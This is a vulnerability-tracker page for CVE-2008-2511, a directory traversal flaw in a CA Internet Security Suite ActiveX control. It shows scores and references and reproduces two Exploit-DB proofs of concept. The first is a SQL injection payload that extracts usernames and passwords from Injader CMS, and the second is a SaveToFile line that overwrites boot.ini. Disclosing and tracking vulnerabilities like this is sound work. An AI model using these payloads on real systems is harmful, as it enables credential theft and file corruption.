CVE-2008-2511
Published 2008-06-02
Priority: P3 46 | critical | 9.3 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 10.01% (95.0th percentile)
Directory traversal vulnerability in the UmxEventCli.CachedAuditDataList.1 (aka UmxEventCliLib) ActiveX control in UmxEventCli.dll in CA Internet Security Suite 2008 allows remote attackers to create and overwrite arbitrary files via a .. (dot dot) in the argument to the SaveToFile method. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
Injader CMS 2.1.1 - 'id' SQL Injection
exploitdb·2008-12-18
CVE-2008-5890 Injader CMS 2.1.1 - 'id' SQL Injection
---
Injader CMS
http://www.injader.com/
- (= 2.1.1 -
- SQL -
http://localhost/upload/feeds.php?name=articles&id=
magic_quotes_gpc = Off
register_globals = On
Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-18]
Exploit-DB
CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
exploitdb·2008-05-28
CVE-2008-2511 CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
---
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
# milw0rm.com [2008-05-28]
No writeups or analysis indexed.
http://retrogod.altervista.org/9sg_CA_poc.html
http://secunia.com/advisories/30420
http://www.securityfocus.com/archive/1/492679/100/0/threaded
http://www.securitytracker.com/id?1020129
http://www.vupen.com/english/advisories/2008/1696/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/42712
https://www.exploit-db.com/exploits/5682